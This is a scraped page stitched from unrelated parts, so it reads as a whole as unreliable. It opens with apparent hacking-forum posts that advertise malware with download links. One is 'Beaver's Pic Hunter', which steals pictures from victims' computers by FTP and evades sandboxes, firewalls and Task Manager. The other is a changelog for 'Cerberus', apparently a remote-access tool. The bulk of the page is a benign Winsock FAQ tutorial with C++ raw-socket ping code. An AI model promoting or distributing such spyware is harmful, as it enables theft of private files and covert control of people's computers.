This steals pictures from your customers computer Beaver's Pic Hunter Version 1.5 Here Is What It Looks Like On The FTP Features: FTP Upload All Picture Files Containing The Selected Extensions On The Selected Drive Anti-Wireshark Anti-Anubis Anti-Zone Alarm Anti-Sandbox Copy Itself To C:\ And Add To Starup Registry Disable Task Manager Add A Custom Extension To Search For Download: http://www.2shared.com/file/7062928/f83aedbd/Beavers_Pic_Hunter_15.html

Download: http://www.2shared.com/file/7062897/8ab343d0/Redix_-_PoPCoRn.html

Changelog 1.0 Added EULA Removed Plugin Popup Added No-Ip Auto Updater Added DynDns Auto Updater Fixed RAM Display Bug Now Saves your Window State on close of Cerberus Fixed Visible Mode from not properly closing out process Removed LAN Ip from display Removed HWID from Client Name Removed Buggy SMTP Keylogger Send and MSN tab in Extra Options Now Displays if system is 32bit or 64bit Identifies system as Windows 7 Some other small server stability fix's Download: http://www.2shared.com/file/7062888/3176f00/Cerberus.html

"Your Security Get Down !! No Thing To Say , Only Be Have More Security !!" Cat urasc jegurile astea de texte. @d3v1l: De ce sa fie timpul sa se intample?

Winsock Programmer's FAQ Examples: Ping: Raw Sockets Method This pinger uses "raw sockets", so it requires Winsock 2. It's about 3 times longer (288 non-comment lines versus 98) than the ICMP method, but it will continue to work, while the ICMP method might fail to work on future versions of Windows. This program is also much more flexible than the ICMP.DLL pinger. To use this program on Windows NT derivatives, you must be logged in as an Administrator. This program is split into two major parts: a driver part and a "pinger" part. The driver mainly just declares main(), which calls the functions in the pinger part in the proper sequence. The pinger part is mostly reusable as-is, although you will probably want to do things like exchanging the output statements for encoded return values. There is also a separate module for the IP checksum calculation function because it is not specifically tied to pinging; this same algorithm is used in other parts of TCP/IP. This program allows you to change the ICMP packet's TTL (time to live) value. From this, you can do several other interesting things, like developing a traceroute utility, and finding the next hop (such as a router) on your network. Notice that we don't use the "ttl" field in struct IPHeader, because we can only receive the full IP header, not send it. Instead, we use the setsockopt() with the IP_TTL flag to set the TTL option in the IP header. You might want to add timeout functionality to this program, so that it doesn't wait forever for a ping reply. Two ways to handle this are to 1) spin the ping off into a separate thread and handle the timeout from the main thread; or 2) drop in a call to select() before the recvfrom() call, passing something reasonable for the timeout argument. This program is based on a program in the Win32 SDK, though hardly any of the original code remains. Also, this version is a bit smarter, compiles under both Microsoft and Borland C++, and should be much easier to understand and reuse. rawping_driver.cpp /*********************************************************************** rawping_driver.cpp - A driver program to test the rawping.cpp module. Building under Microsoft C++ 5.0: cl -GX rawping.cpp rawping_driver.cpp ip_checksum.cpp ws2_32.lib Building under Borland C++ 5.0: bcc32 rawping.cpp rawping_driver.cpp ip_checksum.cpp ws2_32.lib ---------------------------------------------------------------------- Change log: 9/21/1998 - Added TTL support. 2/14/1998 - Polished the program up and separated out the rawping.cpp and ip_checksum.cpp modules. Also got it to work under Borland C++. 2/12/1998 - Fixed a problem with the checksum calculation. Program works now. 2/6/1998 - Created using Microsoft's "raw ping" sample in the Win32 SDK as a model. Not much remains of the original code. ***********************************************************************/ #include <winsock2.h> #include <iostream.h> #include "rawping.h" #define DEFAULT_PACKET_SIZE 32 #define DEFAULT_TTL 30 #define MAX_PING_DATA_SIZE 1024 #define MAX_PING_PACKET_SIZE (MAX_PING_DATA_SIZE + sizeof(IPHeader)) int allocate_buffers(ICMPHeader*& send_buf, IPHeader*& recv_buf, int packet_size); /////////////////////////////////////////////////////////////////////// // Program entry point int main(int argc, char* argv[]) { // Init some variables at top, so they aren't skipped by the // cleanup routines. int seq_no = 0; ICMPHeader* send_buf = 0; IPHeader* recv_buf = 0; // Did user pass enough parameters? if (argc < 2) { cerr << "usage: " << argv[0] << " <host> [data_size] [ttl]" << endl; cerr << "\tdata_size can be up to " << MAX_PING_DATA_SIZE << " bytes. Default is " << DEFAULT_PACKET_SIZE << "." << endl; cerr << "\tttl should be 255 or lower. Default is " << DEFAULT_TTL << "." << endl; return 1; } // Figure out how big to make the ping packet int packet_size = DEFAULT_PACKET_SIZE; int ttl = DEFAULT_TTL; if (argc > 2) { int temp = atoi(argv[2]); if (temp != 0) { packet_size = temp; } if (argc > 3) { temp = atoi(argv[3]); if ((temp >= 0) && (temp <= 255)) { ttl = temp; } } } packet_size = max(sizeof(ICMPHeader), min(MAX_PING_DATA_SIZE, (unsigned int)packet_size)); // Start Winsock up WSAData wsaData; if (WSAStartup(MAKEWORD(2, 1), &wsaData) != 0) { cerr << "Failed to find Winsock 2.1 or better." << endl; return 1; } // Set up for pinging SOCKET sd; sockaddr_in dest, source; if (setup_for_ping(argv[1], ttl, sd, dest) < 0) { goto cleanup; } if (allocate_buffers(send_buf, recv_buf, packet_size) < 0) { goto cleanup; } init_ping_packet(send_buf, packet_size, seq_no); // Send the ping and receive the reply if (send_ping(sd, dest, send_buf, packet_size) >= 0) { while (1) { // Receive replies until we either get a successful read, // or a fatal error occurs. if (recv_ping(sd, source, recv_buf, MAX_PING_PACKET_SIZE) < 0) { // Pull the sequence number out of the ICMP header. If // it's bad, we just complain, but otherwise we take // off, because the read failed for some reason. unsigned short header_len = recv_buf->h_len * 4; ICMPHeader* icmphdr = (ICMPHeader*) ((char*)recv_buf + header_len); if (icmphdr->seq != seq_no) { cerr << "bad sequence number!" << endl; continue; } else { break; } } if (decode_reply(recv_buf, packet_size, &source) != -2) { // Success or fatal error (as opposed to a minor error) // so take off. break; } } } cleanup: delete[]send_buf; delete[]recv_buf; WSACleanup(); return 0; } /////////////////////////// allocate_buffers /////////////////////////// // Allocates send and receive buffers. Returns < 0 for failure. int allocate_buffers(ICMPHeader*& send_buf, IPHeader*& recv_buf, int packet_size) { // First the send buffer send_buf = (ICMPHeader*)new char[packet_size]; if (send_buf == 0) { cerr << "Failed to allocate output buffer." << endl; return -1; } // And then the receive buffer recv_buf = (IPHeader*)new char[MAX_PING_PACKET_SIZE]; if (recv_buf == 0) { cerr << "Failed to allocate output buffer." << endl; return -1; } return 0; } rawping.cpp /*********************************************************************** rawping.cpp - Contains all of the functions essential to sending "ping" packets using Winsock 2 raw sockets. Depends on ip_checksum.cpp for calculating IP-style checksums on blocks of data, however. ***********************************************************************/ #include <winsock2.h> #include <ws2tcpip.h> #include <iostream.h> #include "rawping.h" #include "ip_checksum.h" //////////////////////////// setup_for_ping //////////////////////////// // Creates the Winsock structures necessary for sending and recieving // ping packets. host can be either a dotted-quad IP address, or a // host name. ttl is the time to live (a.k.a. number of hops) for the // packet. The other two parameters are outputs from the function. // Returns < 0 for failure. int setup_for_ping(char* host, int ttl, SOCKET& sd, sockaddr_in& dest) { // Create the socket sd = WSASocket(AF_INET, SOCK_RAW, IPPROTO_ICMP, 0, 0, 0); if (sd == INVALID_SOCKET) { cerr << "Failed to create raw socket: " << WSAGetLastError() << endl; return -1; } if (setsockopt(sd, IPPROTO_IP, IP_TTL, (const char*)&ttl, sizeof(ttl)) == SOCKET_ERROR) { cerr << "TTL setsockopt failed: " << WSAGetLastError() << endl; return -1; } // Initialize the destination host info block memset(&dest, 0, sizeof(dest)); // Turn first passed parameter into an IP address to ping unsigned int addr = inet_addr(host); if (addr != INADDR_NONE) { // It was a dotted quad number, so save result dest.sin_addr.s_addr = addr; dest.sin_family = AF_INET; } else { // Not in dotted quad form, so try and look it up hostent* hp = gethostbyname(host); if (hp != 0) { // Found an address for that host, so save it memcpy(&(dest.sin_addr), hp->h_addr, hp->h_length); dest.sin_family = hp->h_addrtype; } else { // Not a recognized hostname either! cerr << "Failed to resolve " << host << endl; return -1; } } return 0; } /////////////////////////// init_ping_packet /////////////////////////// // Fill in the fields and data area of an ICMP packet, making it // packet_size bytes by padding it with a byte pattern, and giving it // the given sequence number. That completes the packet, so we also // calculate the checksum for the packet and place it in the appropriate // field. void init_ping_packet(ICMPHeader* icmp_hdr, int packet_size, int seq_no) { // Set up the packet's fields icmp_hdr->type = ICMP_ECHO_REQUEST; icmp_hdr->code = 0; icmp_hdr->checksum = 0; icmp_hdr->id = (USHORT)GetCurrentProcessId(); icmp_hdr->seq = seq_no; icmp_hdr->timestamp = GetTickCount(); // "You're dead meat now, packet!" const unsigned long int deadmeat = 0xDEADBEEF; char* datapart = (char*)icmp_hdr + sizeof(ICMPHeader); int bytes_left = packet_size - sizeof(ICMPHeader); while (bytes_left > 0) { memcpy(datapart, &deadmeat, min(int(sizeof(deadmeat)), bytes_left)); bytes_left -= sizeof(deadmeat); datapart += sizeof(deadmeat); } // Calculate a checksum on the result icmp_hdr->checksum = ip_checksum((USHORT*)icmp_hdr, packet_size); } /////////////////////////////// send_ping ////////////////////////////// // Send an ICMP echo ("ping") packet to host dest by way of sd with // packet_size bytes. packet_size is the total size of the ping packet // to send, including the ICMP header and the payload area; it is not // checked for sanity, so make sure that it's at least // sizeof(ICMPHeader) bytes, and that send_buf points to at least // packet_size bytes. Returns < 0 for failure. int send_ping(SOCKET sd, const sockaddr_in& dest, ICMPHeader* send_buf, int packet_size) { // Send the ping packet in send_buf as-is cout << "Sending " << packet_size << " bytes to " << inet_ntoa(dest.sin_addr) << "..." << flush; int bwrote = sendto(sd, (char*)send_buf, packet_size, 0, (sockaddr*)&dest, sizeof(dest)); if (bwrote == SOCKET_ERROR) { cerr << "send failed: " << WSAGetLastError() << endl; return -1; } else if (bwrote < packet_size) { cout << "sent " << bwrote << " bytes..." << flush; } return 0; } /////////////////////////////// recv_ping ////////////////////////////// // Receive a ping reply on sd into recv_buf, and stores address info // for sender in source. On failure, returns < 0, 0 otherwise. // // Note that recv_buf must be larger than send_buf (passed to send_ping) // because the incoming packet has the IP header attached. It can also // have IP options set, so it is not sufficient to make it // sizeof(send_buf) + sizeof(IPHeader). We suggest just making it // fairly large and not worrying about wasting space. int recv_ping(SOCKET sd, sockaddr_in& source, IPHeader* recv_buf, int packet_size) { // Wait for the ping reply int fromlen = sizeof(source); int bread = recvfrom(sd, (char*)recv_buf, packet_size + sizeof(IPHeader), 0, (sockaddr*)&source, &fromlen); if (bread == SOCKET_ERROR) { cerr << "read failed: "; if (WSAGetLastError() == WSAEMSGSIZE) { cerr << "buffer too small" << endl; } else { cerr << "error #" << WSAGetLastError() << endl; } return -1; } return 0; } ///////////////////////////// decode_reply ///////////////////////////// // Decode and output details about an ICMP reply packet. Returns -1 // on failure, -2 on "try again" and 0 on success. int decode_reply(IPHeader* reply, int bytes, sockaddr_in* from) { // Skip ahead to the ICMP header within the IP packet unsigned short header_len = reply->h_len * 4; ICMPHeader* icmphdr = (ICMPHeader*)((char*)reply + header_len); // Make sure the reply is sane if (bytes < header_len + ICMP_MIN) { cerr << "too few bytes from " << inet_ntoa(from->sin_addr) << endl; return -1; } else if (icmphdr->type != ICMP_ECHO_REPLY) { if (icmphdr->type != ICMP_TTL_EXPIRE) { if (icmphdr->type == ICMP_DEST_UNREACH) { cerr << "Destination unreachable" << endl; } else { cerr << "Unknown ICMP packet type " << int(icmphdr->type) << " received" << endl; } return -1; } // If "TTL expired", fall through. Next test will fail if we // try it, so we need a way past it. } else if (icmphdr->id != (USHORT)GetCurrentProcessId()) { // Must be a reply for another pinger running locally, so just // ignore it. return -2; } // Figure out how far the packet travelled int nHops = int(256 - reply->ttl); if (nHops == 192) { // TTL came back 64, so ping was probably to a host on the // LAN -- call it a single hop. nHops = 1; } else if (nHops == 128) { // Probably localhost nHops = 0; } // Okay, we ran the gamut, so the packet must be legal -- dump it cout << endl << bytes << " bytes from " << inet_ntoa(from->sin_addr) << ", icmp_seq " << icmphdr->seq << ", "; if (icmphdr->type == ICMP_TTL_EXPIRE) { cout << "TTL expired." << endl; } else { cout << nHops << " hop" << (nHops == 1 ? "" : "s"); cout << ", time: " << (GetTickCount() - icmphdr->timestamp) << " ms." << endl; } return 0; } rawping.h /*********************************************************************** rawping.h - Declares the types, constants and prototypes required to use the rawping.cpp module. ***********************************************************************/ #define WIN32_LEAN_AND_MEAN #include <winsock2.h> // ICMP packet types #define ICMP_ECHO_REPLY 0 #define ICMP_DEST_UNREACH 3 #define ICMP_TTL_EXPIRE 11 #define ICMP_ECHO_REQUEST 8 // Minimum ICMP packet size, in bytes #define ICMP_MIN 8 #ifdef _MSC_VER // The following two structures need to be packed tightly, but unlike // Borland C++, Microsoft C++ does not do this by default. #pragma pack(1) #endif // The IP header struct IPHeader { BYTE h_len:4; // Length of the header in dwords BYTE version:4; // Version of IP BYTE tos; // Type of service USHORT total_len; // Length of the packet in dwords USHORT ident; // unique identifier USHORT flags; // Flags BYTE ttl; // Time to live BYTE proto; // Protocol number (TCP, UDP etc) USHORT checksum; // IP checksum ULONG source_ip; ULONG dest_ip; }; // ICMP header struct ICMPHeader { BYTE type; // ICMP packet type BYTE code; // Type sub code USHORT checksum; USHORT id; USHORT seq; ULONG timestamp; // not part of ICMP, but we need it }; #ifdef _MSC_VER #pragma pack() #endif extern int setup_for_ping(char* host, int ttl, SOCKET& sd, sockaddr_in& dest); extern int send_ping(SOCKET sd, const sockaddr_in& dest, ICMPHeader* send_buf, int packet_size); extern int recv_ping(SOCKET sd, sockaddr_in& source, IPHeader* recv_buf, int packet_size); extern int decode_reply(IPHeader* reply, int bytes, sockaddr_in* from); extern void init_ping_packet(ICMPHeader* icmp_hdr, int packet_size, int seq_no); ip_checksum.cpp /*********************************************************************** ip_checksum.cpp - Calculates IP-style checksums on a block of data. ***********************************************************************/ #define WIN32_LEAN_AND_MEAN #include <windows.h> USHORT ip_checksum(USHORT* buffer, int size) { unsigned long cksum = 0; // Sum all the words together, adding the final byte if size is odd while (size > 1) { cksum += *buffer++; size -= sizeof(USHORT); } if (size) { cksum += *(UCHAR*)buffer; } // Do a little shuffling cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >> 16); // Return the bitwise complement of the resulting mishmash return (USHORT)(~cksum); } ip_checksum.h extern USHORT ip_checksum(USHORT* buffer, int size); Footnotes 1. The traceroute utility ("tracert.exe") works by setting the TTL field to 1, sending a ping, waiting for the reply, setting TTL to 2...and so on. By looking at the addresses returned in the ICMP_TTL_EXPIRE replies, you can "trace" a route through the Internet. Eventually, you'll get an ICMP_ECHO reply, which lets you know when you've completed the route to the host. (Incidentally, many Unix traceroute utilities use UDP instead of ICMP, which if nothing else doesn't require that you use raw sockets.) 2. Finding the next hop on the network can be useful, because it allows you to discover a gateway to another network, such as the Internet. To do this, set the TTL field to 1, send the ping and see who responds with ICMP_TTL_EXPIRE. This isn't reliable, but it can be useful in some situations.